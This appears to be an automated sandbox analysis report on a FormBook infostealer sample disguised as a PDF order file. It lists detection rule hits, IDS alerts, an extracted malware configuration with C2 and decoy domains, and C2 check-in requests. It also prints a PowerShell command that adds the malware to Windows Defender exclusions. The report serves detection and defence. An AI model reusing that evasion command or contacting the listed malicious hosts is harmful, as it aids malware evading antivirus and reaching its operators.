Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe", ParentImage: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe, ParentProcessId: 6508, ParentProcessName: ORDER_1105-19-24-3537.pdf.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe", ProcessId: 576, ProcessName: powershell.exe

Suricata Signatures

ET MALWARE FormBook CnC Checkin (GET)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-23T14:38:29.395285+0200	2031453	1	Malware Command and Control Activity Detected	192.168.2.5	49721	3.33.130.190	80	TCP
2024-09-23T14:39:16.104025+0200	2031453	1	Malware Command and Control Activity Detected	192.168.2.5	49716	185.53.179.90	80	TCP
2024-09-23T14:39:56.698099+0200	2031453	1	Malware Command and Control Activity Detected	192.168.2.5	49718	162.0.209.7	80	TCP
2024-09-23T14:40:17.342637+0200	2031453	1	Malware Command and Control Activity Detected	192.168.2.5	49719	23.227.38.74	80	TCP
2024-09-23T14:40:58.694135+0200	2031453	1	Malware Command and Control Activity Detected	192.168.2.5	49720	154.21.81.142	80	TCP
2024-09-23T14:42:20.275189+0200	2031453	1	Malware Command and Control Activity Detected	192.168.2.5	49722	13.248.252.114	80	TCP
2024-09-23T14:42:40.656006+0200	2031453	1	Malware Command and Control Activity Detected	192.168.2.5	49723	35.214.167.24	80	TCP
2024-09-23T14:43:02.401051+0200	2031453	1	Malware Command and Control Activity Detected	192.168.2.5	49724	50.87.178.238	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://www.qwechaotk.top/rn94/www.ln2m1.shop	Avira URL Cloud: Label: phishing
Source: http://www.practicalfranchises.info/rn94/	Avira URL Cloud: Label: malware
Source: http://www.bigbrown999.site/rn94/www.bdkasinoxox.xyz	Avira URL Cloud: Label: malware
Source: http://www.yzh478c.xyz/rn94/	Avira URL Cloud: Label: malware
Source: http://www.bigbrown999.site/rn94/	Avira URL Cloud: Label: malware
Source: http://www.longmaosol.xyz	Avira URL Cloud: Label: malware
Source: http://www.laske.xyz/rn94/www.run-run.tokyo	Avira URL Cloud: Label: malware
Source: http://www.practicalfranchises.info/rn94/www.yzh478c.xyz	Avira URL Cloud: Label: malware
Source: http://www.qwechaotk.top	Avira URL Cloud: Label: phishing
Source: http://www.qwechaotk.top/rn94/?jDHh=Fx60rCVvY/PfTPS+x0Yy+mO10iBB7HzlvlxbYnAbTZ/GodXDJ0QLvzTZw6Pc1HX1Gik3&9r9Hc=ytxTjD5hRxA	Avira URL Cloud: Label: phishing
Source: http://www.bdkasinoxox.xyz/rn94/?9r9Hc=ytxTjD5hRxA&jDHh=I5NiMU91ItirT7qNKaN02XXkh1pCEM2b67jBRcxD66PzibDnIUK5R57IVHBUjGxrStSp	Avira URL Cloud: Label: malware
Source: http://www.010101-11122-2222.cloud/rn94/www.longmaosol.xyz	Avira URL Cloud: Label: phishing
Source: http://www.ln2m1.shop/rn94/www.practicalfranchises.info	Avira URL Cloud: Label: malware
Source: http://www.ln2m1.shop/rn94/	Avira URL Cloud: Label: malware
Source: http://www.010101-11122-2222.cloud	Avira URL Cloud: Label: phishing
Source: http://www.run-run.tokyo/rn94/www.010101-11122-2222.cloud	Avira URL Cloud: Label: malware
Source: www.laske.xyz/rn94/	Avira URL Cloud: Label: malware
Source: http://www.laske.xyz/rn94/	Avira URL Cloud: Label: malware
Source: http://www.run-run.tokyo/rn94/	Avira URL Cloud: Label: malware
Source: http://www.yzh478c.xyz/rn94/www.hinet.tech	Avira URL Cloud: Label: malware
Source: http://www.qwechaotk.top/rn94/	Avira URL Cloud: Label: phishing
Source: http://www.010101-11122-2222.cloud/rn94/	Avira URL Cloud: Label: phishing
Source: http://www.bdkasinoxox.xyz/rn94/www.day2go.net	Avira URL Cloud: Label: malware
Source: http://www.bdkasinoxox.xyz/rn94/	Avira URL Cloud: Label: malware
Source: http://www.longmaosol.xyz/rn94/	Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000008.00000002.4540554051.0000000002B30000.00000040.10000000.00040000.00000000.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.laske.xyz/rn94/"], "decoy": ["st68v.xyz", "conciergenotary.net", "qwechaotk.top", "rtpdonatoto29.xyz", "8ad.xyz", "powermove.top", "cameras-30514.bond", "vanguardcoffee.shop", "umoe53fxc1bsujv.buzz", "consultoriamax.net", "hplxx.com", "ndu.wtf", "yzh478c.xyz", "bigbrown999.site", "xiake07.asia", "resdai.xyz", "the35678.shop", "ba6rf.rest", "ceo688.com", "phimxhot.xyz", "010101-11122-2222.cloud", "champion-casino-skw.buzz", "laku77.bar", "popumail.net", "stargazerastrology.click", "beauty.university", "t460.top", "sparkyos.app", "day2go.net", "minrungis.shop", "cognigrid.com", "abandoned-houses-39863.bond", "liderparti.store", "hinet.tech", "moviemax.live", "business-printer-22001.bond", "yakintv.pro", "longmaosol.xyz", "hello4d.dev", "vestircool.store", "surpriseinside.net", "betflixfan.asia", "ln2m1.shop", "5302mcavt.website", "conf-contact.online", "31140.ooo", "bdkasinoxox.xyz", "nicoleb.tech", "mainz-cruise-deals.today", "run-run.tokyo", "practicalfranchises.info", "usmanovbanki-uz.space", "superlottery.top", "zabbet911.bet", "ambassadorshipvottings.click", "sangforln.tech", "expertoffersusa.lat", "plong.cloud", "cryptoautomata.dev", "dq33xa.xyz", "handtools-16660.bond", "24763wbk.hair", "sportswear-30530.bond", "lusuidnx.shop"]}

Multi AV Scanner detection for domain / URL

Source: nicoleb.tech	Virustotal: Detection: 11%			Perma Link
Source: practicalfranchises.info	Virustotal: Detection: 11%			Perma Link

Multi AV Scanner detection for submitted file

Source: ORDER_1105-19-24-3537.pdf.exe	ReversingLabs: Detection: 68%
Source: ORDER_1105-19-24-3537.pdf.exe	Virustotal: Detection: 70%			Perma Link

Yara detected FormBook

Source: Yara match	File source: 4.2.ORDER_1105-19-24-3537.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.ORDER_1105-19-24-3537.pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.4540554051.0000000002B30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4541049594.00000000046D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4540355301.0000000000790000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2165863634.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2127105917.0000000003E2C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: ORDER_1105-19-24-3537.pdf.exe

Joe Sandbox ML: detected

Source: ORDER_1105-19-24-3537.pdf.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: ORDER_1105-19-24-3537.pdf.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: NgWS.pdb source: ORDER_1105-19-24-3537.pdf.exe
Source:	Binary string: wntdll.pdbUGP source: ORDER_1105-19-24-3537.pdf.exe, 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.2166507711.00000000045D8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.2169166091.0000000004784000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.4541336053.0000000004ACE000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.4541336053.0000000004930000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: ORDER_1105-19-24-3537.pdf.exe, ORDER_1105-19-24-3537.pdf.exe, 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, rundll32.exe, 00000008.00000003.2166507711.00000000045D8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.2169166091.0000000004784000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.4541336053.0000000004ACE000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.4541336053.0000000004930000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: rundll32.pdb source: ORDER_1105-19-24-3537.pdf.exe, 00000004.00000002.2166313350.0000000000CBD000.00000004.00000020.00020000.00000000.sdmp, ORDER_1105-19-24-3537.pdf.exe, 00000004.00000002.2166669799.00000000010D0000.00000040.10000000.00040000.00000000.sdmp, rundll32.exe, rundll32.exe, 00000008.00000002.4540434284.0000000000A00000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: rundll32.pdbGCTL source: ORDER_1105-19-24-3537.pdf.exe, 00000004.00000002.2166313350.0000000000CBD000.00000004.00000020.00020000.00000000.sdmp, ORDER_1105-19-24-3537.pdf.exe, 00000004.00000002.2166669799.00000000010D0000.00000040.10000000.00040000.00000000.sdmp, rundll32.exe, 00000008.00000002.4540434284.0000000000A00000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: NgWS.pdbSHA256 source: ORDER_1105-19-24-3537.pdf.exe

Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4x nop then jmp 076135E3h	0_2_07612CDC
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4x nop then jmp 076135E3h	0_2_07612C8B
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4x nop then jmp 076135E3h	0_2_076133D8
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4x nop then jmp 076135E3h	0_2_076131ED
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4x nop then pop edi	4_2_00417AFD
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4x nop then pop edi	4_2_00417BD9
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4x nop then pop edi	4_2_00417BF6
Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe	Code function: 4x nop then pop edi	4_2_00416CDB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4x nop then pop edi	8_2_007A7AFD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4x nop then pop edi	8_2_007A7BF6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4x nop then pop edi	8_2_007A7BD9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4x nop then pop edi	8_2_007A6CDB

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.5:49720 -> 154.21.81.142:80
Source: Network traffic	Suricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.5:49723 -> 35.214.167.24:80
Source: Network traffic	Suricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.5:49719 -> 23.227.38.74:80
Source: Network traffic	Suricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.5:49719 -> 23.227.38.74:80
Source: Network traffic	Suricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.5:49718 -> 162.0.209.7:80
Source: Network traffic	Suricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.5:49718 -> 162.0.209.7:80
Source: Network traffic	Suricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.5:49720 -> 154.21.81.142:80
Source: Network traffic	Suricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.5:49720 -> 154.21.81.142:80
Source: Network traffic	Suricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.5:49718 -> 162.0.209.7:80
Source: Network traffic	Suricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.5:49719 -> 23.227.38.74:80
Source: Network traffic	Suricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.5:49724 -> 50.87.178.238:80
Source: Network traffic	Suricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.5:49716 -> 185.53.179.90:80
Source: Network traffic	Suricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.5:49716 -> 185.53.179.90:80
Source: Network traffic	Suricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.5:49723 -> 35.214.167.24:80
Source: Network traffic	Suricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.5:49724 -> 50.87.178.238:80
Source: Network traffic	Suricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.5:49723 -> 35.214.167.24:80
Source: Network traffic	Suricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.5:49724 -> 50.87.178.238:80
Source: Network traffic	Suricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.5:49716 -> 185.53.179.90:80
Source: Network traffic	Suricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.5:49722 -> 13.248.252.114:80
Source: Network traffic	Suricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.5:49722 -> 13.248.252.114:80
Source: Network traffic	Suricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.5:49722 -> 13.248.252.114:80
Source: Network traffic	Suricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.5:49721 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.5:49721 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.5:49721 -> 3.33.130.190:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: www.laske.xyz/rn94/

Performs DNS queries to domains with low reputation

Source:	DNS query: www.bdkasinoxox.xyz
Source:	DNS query: www.yzh478c.xyz

Source: global traffic	HTTP traffic detected: GET /rn94/?9r9Hc=ytxTjD5hRxA&jDHh=+TOTySD/xKzI1m9iyt2YV9oe7irabqlb0FG3M+MtGGXp3TOb0Tp0F4yVfcOIeMFlF/xp HTTP/1.1Host: www.abandoned-houses-39863.bondConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /rn94/?9r9Hc=ytxTjD5hRxA&jDHh=I5NiMU91ItirT7qNKaN02XXkh1pCEM2b67jBRcxD66PzibDnIUK5R57IVHBUjGxrStSp HTTP/1.1Host: www.bdkasinoxox.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /rn94/?jDHh=Ls1ijzPDaFH4ewLYvuUNL8D06n2bzs/1tKV87wXNHEYKjENRXhu0pLj1Kv8q6blj9L7T&9r9Hc=ytxTjD5hRxA HTTP/1.1Host: www.day2go.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /rn94/?jDHh=Fx60rCVvY/PfTPS+x0Yy+mO10iBB7HzlvlxbYnAbTZ/GodXDJ0QLvzTZw6Pc1HX1Gik3&9r9Hc=ytxTjD5hRxA HTTP/1.1Host: www.qwechaotk.topConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View	IP Address: 185.53.179.90 185.53.179.90
Source: Joe Sandbox View	IP Address: 23.227.38.74 23.227.38.74

Source: Joe Sandbox View	ASN Name: TEAMINTERNET-ASDE TEAMINTERNET-ASDE
Source: Joe Sandbox View	ASN Name: COGENT-174US COGENT-174US
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: ACPCA ACPCA

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Windows\explorer.exe

Code function: 6_2_0F004F82 getaddrinfo,setsockopt,recv,

6_2_0F004F82

Source: global traffic	HTTP traffic detected: GET /rn94/?9r9Hc=ytxTjD5hRxA&jDHh=+TOTySD/xKzI1m9iyt2YV9oe7irabqlb0FG3M+MtGGXp3TOb0Tp0F4yVfcOIeMFlF/xp HTTP/1.1Host: www.abandoned-houses-39863.bondConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /rn94/?9r9Hc=ytxTjD5hRxA&jDHh=I5NiMU91ItirT7qNKaN02XXkh1pCEM2b67jBRcxD66PzibDnIUK5R57IVHBUjGxrStSp HTTP/1.1Host: www.bdkasinoxox.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /rn94/?jDHh=Ls1ijzPDaFH4ewLYvuUNL8D06n2bzs/1tKV87wXNHEYKjENRXhu0pLj1Kv8q6blj9L7T&9r9Hc=ytxTjD5hRxA HTTP/1.1Host: www.day2go.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /rn94/?jDHh=Fx60rCVvY/PfTPS+x0Yy+mO10iBB7HzlvlxbYnAbTZ/GodXDJ0QLvzTZw6Pc1HX1Gik3&9r9Hc=ytxTjD5hRxA HTTP/1.1Host: www.qwechaotk.topConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: global traffic	DNS traffic detected: DNS query: www.abandoned-houses-39863.bond
Source: global traffic	DNS traffic detected: DNS query: www.bigbrown999.site
Source: global traffic	DNS traffic detected: DNS query: www.bdkasinoxox.xyz
Source: global traffic	DNS traffic detected: DNS query: www.day2go.net
Source: global traffic	DNS traffic detected: DNS query: www.qwechaotk.top
Source: global traffic	DNS traffic detected: DNS query: www.ln2m1.shop
Source: global traffic	DNS traffic detected: DNS query: www.practicalfranchises.info
Source: global traffic	DNS traffic detected: DNS query: www.yzh478c.xyz
Source: global traffic	DNS traffic detected: DNS query: www.hinet.tech
Source: global traffic	DNS traffic detected: DNS query: www.beauty.university
Source: global traffic	DNS traffic detected: DNS query: www.nicoleb.tech

Source: global traffic

HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 23 Sep 2024 12:40:17 GMTContent-Type: text/html; charset=UTF-8Content-Length: 4514Connection: closeX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: max-age=15Expires: Mon, 23 Sep 2024 12:40:32 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=I2qQWrM20N5faV9aAR3kFKH%2FGBGeHmczNqtYiKvhMjHGbQ5rmgR9MKYcWyVXj5F7YZahUvFJeV%2FHpG84WbJROtIQL11zvXWElhDfufTbV0h0WAoX3uvnphllFVLoo5wo"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=10.999918X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffX-Permitted-Cross-Domain-Policies: noneX-Download-Options: noopenServer: cloudflareCF-RAY: 8c7a9a33f9fa7d02-EWRData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 Data Ascii: <!DOCTYPE html> <html class="no-js" lang="en-US"> <head><title>Attention Required! | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="

Source: explorer.exe, 00000006.00000000.2113534114.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4545985269.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4545985269.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2113534114.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: explorer.exe, 00000006.00000002.4540391524.0000000000F13000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2104403018.0000000000F13000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.v
Source: explorer.exe, 00000006.00000000.2113534114.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4545985269.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4545985269.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2113534114.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: explorer.exe, 00000006.00000000.2113534114.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4545985269.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4545985269.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2113534114.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: explorer.exe, 00000006.00000000.2113534114.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4545985269.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4545985269.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2113534114.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 00000006.00000002.4545985269.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2113534114.00000000099C0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: explorer.exe, 00000006.00000000.2110577244.0000000007DC0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.4545353791.0000000008890000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.4545269942.0000000008870000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.micro
Source: ORDER_1105-19-24-3537.pdf.exe, 00000000.00000002.2126422712.0000000002D21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.010101-11122-2222.cloud
Source: explorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.010101-11122-2222.cloud/rn94/
Source: explorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.010101-11122-2222.cloud/rn94/www.longmaosol.xyz
Source: explorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.010101-11122-2222.cloudReferer:
Source: explorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.abandoned-houses-39863.bond
